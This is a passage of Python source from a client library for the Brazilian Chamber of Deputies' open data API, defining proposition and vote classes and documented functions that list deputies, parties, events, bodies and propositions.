            'dataInicio': None if inicio is None else parse.data(inicio, 'camara'),
            'dataFim': None if fim is None else parse.data(fim, 'camara'),
            'idLegislatura': legislatura,
        }
        params = {chave: valor for chave, valor in filtros.items() if valor is not None}
        params['pagina'] = pagina
        if itens is not None:
            params['itens'] = itens
        params['ordem'] = 'asc' if asc else 'desc'
        if ordenar_por is not None:
            params['ordenarPor'] = ordenar_por
        dados = _get(path=['partidos', str(self.cod), 'membros'], params=params)
        return _df(dados, 'id' if index else None)
class Proposicao:
    '''
    Detailed information about a specific legislative proposition.

    Parameters
    ----------
    cod : int
        Numeric code of the desired proposition.

    Attributes
    ----------
    dados : dict
        Full raw payload returned by the API.
    cod : int
        Numeric code of the proposition.
    uri : str
        API endpoint for direct data collection about the proposition.
    tipo_sigla : str
        Abbreviation of the proposition type.
    tipo_codigo : int
        Numeric code of the proposition type.
    numero : int
        Number of the proposition.
    ano : int
        Year of the proposition.
    ementa : str
        Summary (ementa) of the proposition.
    apresentacao : str
        Presentation timestamp, in 'AAAA-MM-DD HH:MM' format.
    uri_orgao_numerador : str
        API endpoint of the numbering body.
    ultima_atualizacao : str
        Date of the last update of the proposition's status.
    sequencia : int
        Sequence of the proposition.
    sigla_orgao : str
        Abbreviation of the body.
    uri_orgao : str
        API endpoint of the body.
    uri_ultimo_relator : str
        API endpoint of the last rapporteur.
    regime : str
        Processing regime of the proposition.
    descricao_tramitacao : str
        Description of the processing step.
    cod_tipo_tramitacao : str
        Code of the processing step type.
    descricao_situacao : str
        Description of the proposition's situation.
    cod_situacao : int
        Numeric code of the proposition's situation.
    despacho : str
        Dispatch text.
    url : str
        URL of the proposition.
    ambito : str
        Scope of the proposition.
    uri_autores : str
        API endpoint of the authors.
    descricao_tipo : str
        Description of the proposition type.
    ementa_detalhada : str
        Detailed summary of the proposition.
    keywords : str
        Keywords of the proposition.
    uri_proposicao_principal : str
        API endpoint of the main proposition.
    uri_proposicao_anterior : str
        API endpoint of the previous proposition.
    uri_proposicao_posterior : str
        API endpoint of the next proposition.
    url_inteiro_teor : str
        URL of the full text.
    urn_final : str
        Final URN.
    texto : str
        Text of the proposition.
    justificativa : str
        Justification of the proposition.

    Examples
    --------
    Get the summary of proposition #15990.
    >>> prop = camara.Proposicao(cod=15990)
    >>> prop.ementa
    ... 'Cria salvaguardas para a tecnologia no campo nuclear...'
    --------------------------------------------------------------------------
    '''

    def __init__(self, cod: int):
        self.cod = cod
        self.dados = _get(['proposicoes', str(cod)])['dados']
        # Shorthand for the nested `statusProposicao` record read below.
        status = self.dados['statusProposicao']
        self.uri = self.dados['uri']
        self.tipo_sigla = self.dados['siglaTipo']
        self.tipo_codigo = self.dados['codTipo']
        self.numero = self.dados['numero']
        self.ano = self.dados['ano']
        self.ementa = self.dados['ementa']
        self.apresentacao = self.dados['dataApresentacao']
        self.uri_orgao_numerador = self.dados['uriOrgaoNumerador']
        self.ultima_atualizacao = status['dataHora']
        self.sequencia = status['sequencia']
        self.sigla_orgao = status['siglaOrgao']
        self.uri_orgao = status['uriOrgao']
        self.uri_ultimo_relator = status['uriUltimoRelator']
        self.regime = status['regime']
        self.descricao_tramitacao = status['descricaoTramitacao']
        self.cod_tipo_tramitacao = status['codTipoTramitacao']
        self.descricao_situacao = status['descricaoSituacao']
        self.cod_situacao = status['codSituacao']
        self.despacho = status['despacho']
        self.url = status['url']
        self.ambito = status['ambito']
        self.uri_autores = self.dados['uriAutores']
        self.descricao_tipo = self.dados['descricaoTipo']
        self.ementa_detalhada = self.dados['ementaDetalhada']
        self.keywords = self.dados['keywords']
        self.uri_proposicao_principal = self.dados['uriPropPrincipal']
        self.uri_proposicao_anterior = self.dados['uriPropAnterior']
        self.uri_proposicao_posterior = self.dados['uriPropPosterior']
        self.url_inteiro_teor = self.dados['urlInteiroTeor']
        self.urn_final = self.dados['urnFinal']
        self.texto = self.dados['texto']
        self.justificativa = self.dados['justificativa']

    def __repr__(self):
        return f"DadosAbertosBrasil.camara: Proposição {self.cod}"

    def autores(self) -> _pd.DataFrame:
        '''
        List the people and/or entities that authored the proposition.

        Each item identifies a person or entity that authored the
        proposition. Besides deputies, senators, civil society,
        legislative assemblies and the Executive and Judiciary branches
        may also author propositions. Under the Chamber's internal rules
        (art. 102), everyone who signs a proposition is considered an
        author, both proponents and supporters. For more information
        about each author, access the URL in the `uri` field when
        available.

        Returns
        -------
        pandas.core.frame.DataFrame
            People and/or entities that authored the proposition.
        ----------------------------------------------------------------------
        '''
        dados = _get(path=['proposicoes', str(self.cod), 'autores'], params=None)
        return _df(dados, None)

    def relacionadas(
            self,
            index: bool = False
        ) -> _pd.DataFrame:
        '''
        Propositions related to this one.

        Basic information about propositions that are somehow related to
        this one, such as opinions, requests, substitutes, etc.

        Parameters
        ----------
        index : bool (default=False)
            If True, sets the `id` column as the DataFrame index.

        Returns
        -------
        pandas.core.frame.DataFrame
            Propositions related to this one.
        ----------------------------------------------------------------------
        '''
        dados = _get(path=['proposicoes', str(self.cod), 'relacionadas'], params=None)
        return _df(dados, 'id' if index else None)

    def temas(
            self,
            index: bool = False
        ) -> _pd.DataFrame:
        '''
        Thematic areas of the proposition.

        Each item holds information about a thematic area the proposition
        relates to, according to the official classification of the
        Chamber's Documentation and Information Center.

        Parameters
        ----------
        index : bool (default=False)
            If True, sets the `codTema` column as the DataFrame index.

        Returns
        -------
        pandas.core.frame.DataFrame
            Thematic areas of the proposition.
        ----------------------------------------------------------------------
        '''
        dados = _get(path=['proposicoes', str(self.cod), 'temas'], params=None)
        return _df(dados, 'codTema' if index else None)

    def tramitacoes(
            self,
            inicio: str = None,
            fim: str = None,
            index: bool = False
        ) -> _pd.DataFrame:
        '''
        Processing history of the proposition.

        Each item is a snapshot of the information that can change at
        each processing step of the proposition's life (such as regime
        and situation), plus information about what caused the new state.
        This representation of the processing steps is still provisional.

        Parameters
        ----------
        inicio : str (default=None)
            Processing start date, in 'AAAA-MM-DD' format.
        fim : str (default=None)
            Processing end date, in 'AAAA-MM-DD' format.
        index : bool (default=False)
            If True, sets the `sequencia` column as the DataFrame index.

        Returns
        -------
        pandas.core.frame.DataFrame
            Processing steps of the proposition.
        ----------------------------------------------------------------------
        '''
        # Keep only the date filters the caller actually supplied.
        filtros = {
            'dataInicio': None if inicio is None else parse.data(inicio, 'camara'),
            'dataFim': None if fim is None else parse.data(fim, 'camara'),
        }
        params = {chave: valor for chave, valor in filtros.items() if valor is not None}
        dados = _get(path=['proposicoes', str(self.cod), 'tramitacoes'], params=params)
        return _df(dados, 'sequencia' if index else None)

    def votacoes(
            self,
            asc: bool = False,
            ordenar_por: str = 'dataHoraRegistro',
            index: bool = False
        ) -> _pd.DataFrame:
        '''
        Voting sessions about the proposition.

        Returns a list of basic identifiers of Chamber votes that had the
        proposition as their object or were affected by their results.
        Complementary data on each listed vote can be obtained with the
        `camara.Votacao` object.

        Parameters
        ----------
        asc : bool (default=False)
            Whether records are sorted in ascending order:
            - True: A to Z or 0 to 9 (ascending);
            - False: Z to A or 9 to 0 (descending).
        ordenar_por : str (default='dataHoraRegistro')
            Which element of the representation is used to sort the list.
        index : bool (default=False)
            If True, sets the `id` column as the DataFrame index.

        Returns
        -------
        pandas.core.frame.DataFrame
            Voting sessions about the proposition.
        ----------------------------------------------------------------------
        '''
        params = {
            'ordem': 'asc' if asc else 'desc',
            'ordenarPor': ordenar_por,
        }
        dados = _get(path=['proposicoes', str(self.cod), 'votacoes'], params=params)
        return _df(dados, 'id' if index else None)
class Votacao:
    '''
    Detailed information about a voting session of the Chamber.

    Returns a detailed set of data about the vote, such as the
    propositions that may have been its object and the processing effects
    on other propositions that may have been registered as a consequence
    of this vote.

    Parameters
    ----------
    cod : str
        Alphanumeric code of the voting session (e.g. '2265603-43').

    Attributes
    ----------
    dados : dict
        Full raw payload returned by the API.
    cod : str
        Alphanumeric code of the voting session.
    aprovacao : int
        Approval of the vote.
    data : str
        Date of the vote.
    data_registro : str
        Date and time the vote was registered.
    data_regitro : str
        Deprecated misspelled alias of `data_registro`, kept for
        backward compatibility.
    data_ultima_abertura : str
        Date and time of the last opening of the vote.
    descricao : str
        Description of the vote.
    efeitos_registrados : list
        List of registered effects.
    evento : int
        Numeric code of the vote's event.
    orgao : int
        Numeric code of the vote's body.
    objetos_possiveis : list of dict
        List of possible objects.
    proposicoes_afetadas : str
        Affected propositions.
    sigla_orgao : str
        Abbreviation of the body.
    ultima_apresentacao_proposicao : dict
        Last presentation of the proposition.
    uri : str
        API endpoint for direct data collection about the vote.
    uri_evento : str
        API endpoint of the event.
    uri_orgao : str
        API endpoint of the body.

    Examples
    --------
    Get the date of vote #2265603-43.
    >>> vot = camara.Votacao(cod='2265603-43')
    >>> vot.data
    ... '2020-12-22'
    --------------------------------------------------------------------------
    '''

    # Fixed annotation: the code is alphanumeric (e.g. '2265603-43'), so it
    # is a `str`, not an `int`. `str(cod)` still accepts any legacy callers
    # that passed a purely numeric code as an int.
    def __init__(self, cod: str):
        self.cod = cod
        self.dados = _get(['votacoes', str(cod)])['dados']
        self.aprovacao = self.dados['aprovacao']
        self.data = self.dados['data']
        # `data_registro` is the correctly-spelled attribute; the original
        # misspelled `data_regitro` is kept as an alias so that existing
        # callers do not break.
        self.data_registro = self.dados['dataHoraRegistro']
        self.data_regitro = self.data_registro
        self.data_ultima_abertura = self.dados['dataHoraUltimaAberturaVotacao']
        self.descricao = self.dados['descricao']
        self.efeitos_registrados = self.dados['efeitosRegistrados']
        self.evento = self.dados['idEvento']
        self.orgao = self.dados['idOrgao']
        self.objetos_possiveis = self.dados['objetosPossiveis']
        self.proposicoes_afetadas = self.dados['proposicoesAfetadas']
        self.sigla_orgao = self.dados['siglaOrgao']
        self.ultima_apresentacao_proposicao = self.dados['ultimaApresentacaoProposicao']
        self.uri = self.dados['uri']
        self.uri_evento = self.dados['uriEvento']
        self.uri_orgao = self.dados['uriOrgao']

    def __repr__(self):
        return f"DadosAbertosBrasil.camara: Votação {self.cod}"

    def orientacoes(self, index=False) -> _pd.DataFrame:
        '''
        The vote recommended by each leadership to its deputies.

        In many votes, party and bloc leaders — the caucuses — issue
        voting recommendations to their parliamentarians. Such guidance
        is also issued by the Government, Minority and, more recently,
        Majority and Opposition leaderships. A leadership may also free
        its caucus so each deputy votes as they wish, or go into
        obstruction so its parliamentarians are not counted toward the
        voting quorum.

        If the vote had recommendations, this returns a list in which
        each item contains the identifiers of a party, bloc or
        leadership, and the stance or vote recommended to its
        parliamentarians. So far, only data about recommendations issued
        in Plenary votes is available.

        Parameters
        ----------
        index : bool (default=False)
            If True, sets the `codPartidoBloco` column as the DataFrame
            index.

        Returns
        -------
        pandas.core.frame.DataFrame
            Recommendations issued by leaderships to their deputies.
        ----------------------------------------------------------------------
        '''
        path = ['votacoes', str(self.cod), 'orientacoes']
        dados = _get(path=path, params=None)
        index_col = 'codPartidoBloco' if index else None
        return _df(dados, index_col)

    def votos(self) -> _pd.DataFrame:
        '''
        How each parliamentarian voted in a nominal, open vote.

        If the Chamber vote was nominal and not secret, returns a list
        in which each item contains a deputy's basic identifiers and the
        vote or stance they registered.

        The result is an empty list if the vote was symbolic, in which
        individual votes are not counted. Some symbolic votes do carry
        "vote" records, however: normally parliamentarians who expressly
        asked to have their stance registered.

        Parliamentarians absent from the vote are not listed.

        Returns
        -------
        pandas.core.frame.DataFrame
            List of parliamentarians and their votes.
        ----------------------------------------------------------------------
        '''
        path = ['votacoes', str(self.cod), 'votos']
        dados = _get(path=path, params=None)
        return _df(dados, None)
def lista_blocos(
        legislatura: int = None,
        pagina: int = 1,
        itens: int = None,
        asc: bool = True,
        ordenar_por: str = 'nome',
        index: bool = False
    ) -> _pd.DataFrame:
    '''
    Data on parliamentary blocs.

    In parliamentary activities, parties may join together in blocs.
    When associated, the parties work as if they were a single large
    party, with one leader and one shared set of vice-leaders. Blocs
    only exist until the end of the legislature in which they were
    created: in the following legislature the same parties, if
    associated, form a new bloc. By default this lists the blocs active
    at the time of the request; if legislature numbers are passed via
    `legislatura`, blocs formed and extinguished in those legislatures
    are also listed.

    Parameters
    ----------
    legislatura : int (default=None)
        Legislature number the requested data must correspond to.
    pagina : int (default=1)
        Results page number, starting at 1, containing the number of
        items defined by the `itens` parameter. Defaults to 1 if omitted.
    itens : int (default=None)
        Maximum number of items per page for this request.
    asc : bool (default=True)
        Whether records are sorted in ascending order:
        - True: A to Z or 0 to 9 (ascending);
        - False: Z to A or 9 to 0 (descending).
    ordenar_por : str (default='nome')
        Which element of the representation is used to sort the list.
    index : bool (default=False)
        If True, sets the `id` column as the DataFrame index.

    Returns
    -------
    pandas.core.frame.DataFrame
        Data on parliamentary blocs.
    --------------------------------------------------------------------------
    '''
    params = {} if legislatura is None else {'idLegislatura': legislatura}
    params['pagina'] = pagina
    if itens is not None:
        params['itens'] = itens
    params['ordem'] = 'asc' if asc else 'desc'
    params['ordenarPor'] = ordenar_por
    dados = _get(path='blocos', params=params)
    return _df(dados, 'id' if index else None)
def lista_deputados(
        nome: str = None,
        legislatura: int = None,
        uf: str = None,
        partido: str = None,
        sexo: str = None,
        inicio: str = None,
        fim: str = None,
        pagina: int = 1,
        itens: int = None,
        asc: bool = True,
        ordenar_por: str = 'nome',
        index: bool = False
    ) -> _pd.DataFrame:
    '''
    List and search deputies according to the given criteria.

    Returns basic data on deputies that were in parliamentary office
    during some time interval. When no time parameter such as
    `legislatura` or `inicio` is passed, only deputies in office at the
    time of the request are listed.

    Parameters
    ----------
    nome : str (default=None)
        Part of the parliamentarians' name.
    legislatura : int (default=None)
        Legislature number the requested data must correspond to.
    uf : str (default=None)
        Abbreviation of the federative unit (states and Federal
        District). If None, deputies from all states are returned.
    partido : str (default=None)
        Abbreviation of the party the deputies are affiliated with.
        Use `camara.lista_partidos` for the valid abbreviations.
        Note: different parties may use the same abbreviation in
        different legislatures.
    sexo : str (default=None)
        Letter designating the gender of the parliamentarians:
        - 'M': male;
        - 'F': female.
    inicio : str (default=None)
        Start date of a time interval, in 'AAAA-MM-DD' format.
    fim : str (default=None)
        End date of a time interval, in 'AAAA-MM-DD' format.
    pagina : int (default=1)
        Results page number, starting at 1, containing the number of
        items defined by the `itens` parameter. Defaults to 1 if omitted.
    itens : int (default=None)
        Maximum number of items per page for this request.
    asc : bool (default=True)
        Whether records are sorted in ascending order:
        - True: A to Z or 0 to 9 (ascending);
        - False: Z to A or 9 to 0 (descending).
    ordenar_por : str (default='nome')
        Which element of the representation is used to sort the list.
    index : bool (default=False)
        If True, sets the `id` column as the DataFrame index.

    Returns
    -------
    pandas.core.frame.DataFrame
        List of deputies.
    --------------------------------------------------------------------------
    '''
    # Normalize the optional filters first, then keep only the supplied ones.
    filtros = {
        'nome': nome,
        'idLegislatura': legislatura,
        'siglaUf': None if uf is None else parse.uf(uf),
        'siglaPartido': partido,
        'siglaSexo': sexo,
        'dataInicio': None if inicio is None else parse.data(inicio, 'camara'),
        'dataFim': None if fim is None else parse.data(fim, 'camara'),
    }
    params = {chave: valor for chave, valor in filtros.items() if valor is not None}
    params['pagina'] = pagina
    if itens is not None:
        params['itens'] = itens
    params['ordem'] = 'asc' if asc else 'desc'
    params['ordenarPor'] = ordenar_por
    dados = _get(path='deputados', params=params)
    return _df(dados, 'id' if index else None)
def lista_eventos(
        tipo_evento: int = None,
        situacao: int = None,
        tipo_orgao: int = None,
        orgao: int = None,
        inicio: str = None,
        fim: str = None,
        hora_inicio: str = None,
        hora_fim: str = None,
        pagina: int = 1,
        itens: int = None,
        asc: bool = True,
        ordenar_por: str = 'dataHoraInicio',
        index: bool = False
    ) -> _pd.DataFrame:
    '''
    Events held or scheduled in the various bodies of the Chamber.

    Returns a list whose elements carry basic information about events
    of the Chamber's legislative bodies, scheduled or already held,
    within a certain time interval. That interval can be configured with
    the date and time parameters below. If none is passed, events from
    the five previous days, the five following days and the day of the
    request itself are listed.

    Parameters
    ----------
    tipo_evento : int (default=None)
        Numeric identifier of the desired event type. Valid values can
        be obtained with `camara.referencias('tiposEvento')`.
    situacao : int (default=None)
        Numeric identifier of the event situation type. Valid values can
        be obtained with `camara.referencias('situacoesEvento')`.
    tipo_orgao : int (default=None)
        Numeric identifier of the type of body holding the events.
        Valid values can be obtained with
        `camara.referencias('tiposOrgao')`.
    orgao : int (default=None)
        Numeric identifier of the body. Identifiers can be obtained with
        `camara.lista_orgaos`.
    inicio : str (default=None)
        Start date of a time interval, in 'AAAA-MM-DD' format.
    fim : str (default=None)
        End date of a time interval, in 'AAAA-MM-DD' format.
    hora_inicio : str (default=None)
        Start time of a time interval, in 'HH:MM' format, Brasília time.
    hora_fim : str (default=None)
        End time of a time interval, in 'HH:MM' format, Brasília time.
    pagina : int (default=1)
        Results page number, starting at 1, containing the number of
        items defined by the `itens` parameter. Defaults to 1 if omitted.
    itens : int (default=None)
        Maximum number of items per page for this request.
    asc : bool (default=True)
        Whether records are sorted in ascending order:
        - True: A to Z or 0 to 9 (ascending);
        - False: Z to A or 9 to 0 (descending).
    ordenar_por : str (default='dataHoraInicio')
        Which element of the representation is used to sort the list.
    index : bool (default=False)
        If True, sets the `id` column as the DataFrame index.

    Returns
    -------
    pandas.core.frame.DataFrame
        Events held or scheduled in the various bodies of the Chamber.
    --------------------------------------------------------------------------
    '''
    # Normalize the optional filters first, then keep only the supplied ones.
    filtros = {
        'codTipoEvento': tipo_evento,
        'codSituacao': situacao,
        'codTipoOrgao': tipo_orgao,
        'idOrgao': orgao,
        'dataInicio': None if inicio is None else parse.data(inicio, 'camara'),
        'dataFim': None if fim is None else parse.data(fim, 'camara'),
        'horaInicio': hora_inicio,
        'horaFim': hora_fim,
    }
    params = {chave: valor for chave, valor in filtros.items() if valor is not None}
    params['pagina'] = pagina
    if itens is not None:
        params['itens'] = itens
    params['ordem'] = 'asc' if asc else 'desc'
    params['ordenarPor'] = ordenar_por
    dados = _get(path='eventos', params=params)
    return _df(dados, 'id' if index else None)
def lista_frentes(
        legislatura: int = None,
        pagina: int = 1,
        index: bool = False
    ) -> _pd.DataFrame:
    '''
    Parliamentary fronts of one or more legislatures.

    Returns information about parliamentary fronts — official groupings
    of parliamentarians around a given theme or proposal. Fronts exist
    until the end of the legislature in which they were created, and may
    be recreated each legislature. Some include both deputies and
    senators.

    A legislature number may be passed as a parameter; if omitted, all
    parliamentary fronts created since 2003 are returned.

    Parameters
    ----------
    legislatura : int (default=None)
        Legislature number the requested data must correspond to.
    pagina : int (default=1)
        Results page number, starting at 1, containing the number of
        items defined by the `itens` parameter. Defaults to 1 if omitted.
    index : bool (default=False)
        If True, sets the `id` column as the DataFrame index.

    Returns
    -------
    pandas.core.frame.DataFrame
        Parliamentary fronts of one or more legislatures.
    --------------------------------------------------------------------------
    '''
    params = {} if legislatura is None else {'idLegislatura': legislatura}
    params['pagina'] = pagina
    dados = _get(path='frentes', params=params)
    return _df(dados, 'id' if index else None)
def lista_legislaturas(
        data: str = None,
        pagina: int = 1,
        itens: int = None,
        asc: bool = False,
        ordenar_por: str = 'id',
        index: bool = False
    ) -> _pd.DataFrame:
    '''
    Periods of parliamentary terms and activities of the Chamber.

    A legislature is the period of parliamentary work between one election
    and the next. Each item of the returned list holds basic information
    about one of these periods; the numbers identifying legislatures are
    sequential since the first one.

    Parameters
    ----------
    data : str (default=None)
        Date in the 'AAAA-MM-DD' format. When present, returns basic
        information about the legislature in course at that date.
    pagina : int (default=1)
        Page of results to fetch, starting at 1, each page holding the
        number of items defined by `itens`.
    itens : int (default=None)
        Maximum number of items per page.
    asc : bool (default=False)
        If True, sorts records in ascending order (A to Z, 0 to 9);
        descending otherwise.
    ordenar_por : str (default='id')
        Field of the representation used to sort the list.
    index : bool (default=False)
        If True, sets the `id` column as the DataFrame index.

    Returns
    -------
    pandas.core.frame.DataFrame
        List of legislatures of the Chamber.

    --------------------------------------------------------------------------
    '''
    # Keep only the optional filter that was actually provided.
    filtros = {'data': data}
    params = {chave: valor for chave, valor in filtros.items() if valor is not None}
    params['pagina'] = pagina
    if itens is not None:
        params['itens'] = itens
    params['ordem'] = 'asc' if asc else 'desc'
    params['ordenarPor'] = ordenar_por
    dados = _get(path='legislaturas', params=params)
    return _df(dados, 'id' if index else None)
def lista_orgaos(
        sigla: str = None,
        tipo: int = None,
        inicio: str = None,
        fim: str = None,
        pagina: int = 1,
        itens: int = None,
        asc: bool = True,
        ordenar_por: str = 'id',
        index: bool = False
    ) -> _pd.DataFrame:
    '''
    Committees and other legislative bodies of the Chamber.

    Returns basic information on the legislative bodies — identifiers,
    types and descriptions. The list can be filtered by acronym, body type
    or the period in which the bodies were active, where applicable.

    Parameters
    ----------
    sigla : str (default=None)
        Acronym officially used to designate the body.
    tipo : int (default=None)
        Numeric code of the type of body to look up. Valid codes can be
        obtained with `camara.referencias`.
    inicio : str (default=None)
        Start date ('AAAA-MM-DD') of an interval in which the bodies must
        have been active.
    fim : str (default=None)
        End date ('AAAA-MM-DD') of an interval in which the bodies must
        have been active.
    pagina : int (default=1)
        Page of results to fetch, starting at 1, each page holding the
        number of items defined by `itens`.
    itens : int (default=None)
        Maximum number of items per page.
    asc : bool (default=True)
        If True, sorts records in ascending order (A to Z, 0 to 9);
        descending otherwise.
    ordenar_por : str (default='id')
        Field of the representation used to sort the list.
    index : bool (default=False)
        If True, sets the `id` column as the DataFrame index.

    Returns
    -------
    pandas.core.frame.DataFrame
        Committees and other legislative bodies of the Chamber.

    --------------------------------------------------------------------------
    '''
    # Optional filters; dates are normalized only when present so that
    # `parse.data` is never called with None.
    filtros = {
        'sigla': sigla,
        'codTipoOrgao': tipo,
        'dataInicio': None if inicio is None else parse.data(inicio, 'camara'),
        'dataFim': None if fim is None else parse.data(fim, 'camara'),
    }
    params = {chave: valor for chave, valor in filtros.items() if valor is not None}
    params['pagina'] = pagina
    if itens is not None:
        params['itens'] = itens
    params['ordem'] = 'asc' if asc else 'desc'
    params['ordenarPor'] = ordenar_por
    dados = _get(path='orgaos', params=params)
    return _df(dados, 'id' if index else None)
def lista_partidos(
        legislatura: int = None,
        inicio: str = None,
        fim: str = None,
        pagina: int = 1,
        itens: int = None,
        asc: bool = True,
        ordenar_por: str = 'sigla',
        index: bool = False
    ) -> _pd.DataFrame:
    '''
    Political parties that have, or have had, parliamentarians in office in
    the Chamber.

    Without parameters, returns the parties that have deputies in office at
    the moment of the request. It is also possible to list the parties
    represented in the Chamber over a date interval or a legislature.

    Parameters
    ----------
    legislatura : int (default=None)
        Number of the legislature the data must refer to.
    inicio : str (default=None)
        Start date of an interval, in the 'AAAA-MM-DD' format.
    fim : str (default=None)
        End date of an interval, in the 'AAAA-MM-DD' format.
    pagina : int (default=1)
        Page of results to fetch, starting at 1, each page holding the
        number of items defined by `itens`.
    itens : int (default=None)
        Maximum number of items per page.
    asc : bool (default=True)
        If True, sorts records in ascending order (A to Z, 0 to 9);
        descending otherwise.
    ordenar_por : str (default='sigla')
        Field of the representation used to sort the list.
    index : bool (default=False)
        If True, sets the `id` column as the DataFrame index.

    Returns
    -------
    pandas.core.frame.DataFrame
        Political parties that have, or have had, parliamentarians in
        office in the Chamber.

    --------------------------------------------------------------------------
    '''
    # Optional filters; dates are normalized only when present.
    filtros = {
        'idLegislatura': legislatura,
        'dataInicio': None if inicio is None else parse.data(inicio, 'camara'),
        'dataFim': None if fim is None else parse.data(fim, 'camara'),
    }
    params = {chave: valor for chave, valor in filtros.items() if valor is not None}
    params['pagina'] = pagina
    if itens is not None:
        params['itens'] = itens
    params['ordem'] = 'asc' if asc else 'desc'
    params['ordenarPor'] = ordenar_por
    dados = _get(path='partidos', params=params)
    return _df(dados, 'id' if index else None)
def lista_proposicoes(
        tipo: str = None,
        numero: int = None,
        ano: int = None,
        autor_cod: int = None,
        autor_nome: str = None,
        partido_sigla: str = None,
        partido_cod: int = None,
        autor_uf: str = None,
        keyword: str = None,
        tramitacao_senado: bool = None,
        apresentacao_inicio: str = None,
        apresentacao_fim: str = None,
        situacao: int = None,
        tema: int = None,
        inicio: str = None,
        fim: str = None,
        pagina: int = 1,
        itens: int = None,
        asc: bool = True,
        ordenar_por: str = 'id',
        index: bool = False
    ) -> _pd.DataFrame:
    '''
    Propositions in the Chamber.

    Basic information on bills, resolutions, provisional measures,
    amendments, opinions and every other kind of proposition in the
    Chamber. By default, returns every proposition presented or whose
    status changed in the last 30 days; this processing interval can be
    configured through `inicio` and `fim`.

    When one or more of `ano`, `apresentacao_inicio`, `apresentacao_fim`,
    `autor_cod` or `autor_nome` is given, the processing interval is only
    applied if `inicio` and/or `fim` are explicitly set; otherwise
    propositions without recent processing may be listed (and the response
    may take a long time).

    Parameters
    ----------
    tipo : str (default=None)
        Acronym of the proposition type. Valid types and acronyms can be
        obtained with `camara.referencias`.
    numero : int (default=None)
        Number officially assigned to the proposition under art. 137 of
        the internal regiment, as in "PL 1234/2016".
    ano : int (default=None)
        Presentation year of the propositions, in the 'AAAA' format.
    autor_cod : int (default=None)
        Numeric code of the deputy who authored the propositions.
    autor_nome : str (default=None)
        Name, or part of the name, of the author(s) of the propositions.
    partido_sigla : str (default=None)
        Acronym of the party the authors belong to.
    partido_cod : int (default=None)
        Numeric identifier of the party the authors belong to. These
        identifiers can be obtained with `camara.lista_partidos` and are
        more precise than acronyms, which may be reused by different
        parties over time.
    autor_uf : str (default=None)
        Acronym of the federative unit (state or Federal District) by
        which the author(s) were elected.
    keyword : str (default=None)
        Keyword related to the proposition's theme.
    tramitacao_senado : bool (default=None)
        Restrict to propositions that have already been processed in the
        Senate.
    apresentacao_inicio : str (default=None)
        Start date ('AAAA-MM-DD') of the interval in which the
        propositions were presented.
    apresentacao_fim : str (default=None)
        End date of the interval in which the propositions were presented.
    situacao : int (default=None)
        Numeric code of the propositions' situation. Valid codes can be
        obtained with `camara.referencias`. Warning: this parameter may
        yield unexpected results due to data-registration issues.
    tema : int (default=None)
        Numeric code of the propositions' thematic areas. Valid codes can
        be obtained with `camara.referencias`.
    inicio : str (default=None)
        Start date ('AAAA-MM-DD') of the interval in which the
        propositions were processed. Defaults to 30 days before the
        request.
    fim : str (default=None)
        End date of the processing interval. Defaults to the request day.
    pagina : int (default=1)
        Page of results to fetch, starting at 1, each page holding the
        number of items defined by `itens`.
    itens : int (default=None)
        Maximum number of items per page.
    asc : bool (default=True)
        If True, sorts records in ascending order (A to Z, 0 to 9);
        descending otherwise.
    ordenar_por : str (default='id')
        Field of the representation used to sort the list.
    index : bool (default=False)
        If True, sets the `id` column as the DataFrame index.

    Returns
    -------
    pandas.core.frame.DataFrame
        Propositions in the Chamber.

    --------------------------------------------------------------------------
    '''
    # One mapping table from API field to (already converted) argument;
    # entries left as None are dropped, so converters never see None.
    filtros = {
        'siglaTipo': tipo,
        'numero': numero,
        'ano': ano,
        'idDeputadoAutor': autor_cod,
        'autor': autor_nome,
        'siglaPartidoAutor': partido_sigla,
        'idPartidoAutor': partido_cod,
        'siglaUfAutor': None if autor_uf is None else parse.uf(autor_uf),
        'keywords': keyword,
        'tramitacaoSenado': None if tramitacao_senado is None
            else ('true' if tramitacao_senado else 'false'),
        'dataApresentacaoInicio': apresentacao_inicio,
        'dataApresentacaoFim': apresentacao_fim,
        'codSituacao': situacao,
        'codTema': tema,
        'dataInicio': None if inicio is None else parse.data(inicio, 'camara'),
        'dataFim': None if fim is None else parse.data(fim, 'camara'),
    }
    params = {chave: valor for chave, valor in filtros.items() if valor is not None}
    params['pagina'] = pagina
    if itens is not None:
        params['itens'] = itens
    params['ordem'] = 'asc' if asc else 'desc'
    params['ordenarPor'] = ordenar_por
    dados = _get(path='proposicoes', params=params)
    return _df(dados, 'id' if index else None)
def lista_votacoes(
        proposicao: int = None,
        evento: int = None,
        orgao: int = None,
        inicio: str = None,
        fim: str = None,
        pagina: int = 1,
        itens: int = None,
        asc: bool = False,
        ordenar_por: str = 'dataHoraRegistro',
        index: bool = False
    ) -> _pd.DataFrame:
    '''
    Votes in the Chamber.

    Returns basic information on votes held in events of the Chamber's
    several bodies. Without time-delimiting parameters, data covers every
    vote held in the last 30 days, in events of all bodies.

    The date parameters can widen the period, but for now both dates must
    belong to the same year. When only one of them is present, only votes
    held in that same year, before `fim` or after `inicio`, are returned.

    Parameters
    ----------
    proposicao : int (default=None)
        Numeric code of the proposition, obtainable with
        `camara.lista_proposicoes`. When present, lists the votes that had
        the proposition as their object or that affected it.
    evento : int (default=None)
        Numeric code of the Chamber event in which the votes were held,
        obtainable with `camara.lista_eventos`. Only deliberative events
        can have votes. Events may fall outside the default interval or
        the one defined by `inicio` and/or `fim`.
    orgao : int (default=None)
        Numeric code of the Chamber body. When present, only votes of that
        body are returned. Valid codes can be obtained with
        `camara.lista_orgaos`.
    inicio : str (default=None)
        Start date ('AAAA-MM-DD') of the interval in which the votes were
        held. Used alone, returns votes from this date to the end of the
        same year. Used with `fim`, both dates must share the same year.
    fim : str (default=None)
        End date ('AAAA-MM-DD') of the interval in which the votes were
        held. Used alone, returns every vote from January 1st of the same
        year up to this date. Used with `inicio`, both dates must share
        the same year.
    pagina : int (default=1)
        Page of results to fetch, starting at 1, each page holding the
        number of items defined by `itens`.
    itens : int (default=None)
        Maximum number of items per page.
    asc : bool (default=False)
        If True, sorts records in ascending order (A to Z, 0 to 9);
        descending otherwise.
    ordenar_por : str (default='dataHoraRegistro')
        Field of the representation used to sort the list.
    index : bool (default=False)
        If True, sets the `id` column as the DataFrame index.

    Returns
    -------
    pandas.core.frame.DataFrame
        Votes in the Chamber.

    --------------------------------------------------------------------------
    '''
    # Optional filters; dates are normalized only when present.
    filtros = {
        'idProposicao': proposicao,
        'idEvento': evento,
        'idOrgao': orgao,
        'dataInicio': None if inicio is None else parse.data(inicio, 'camara'),
        'dataFim': None if fim is None else parse.data(fim, 'camara'),
    }
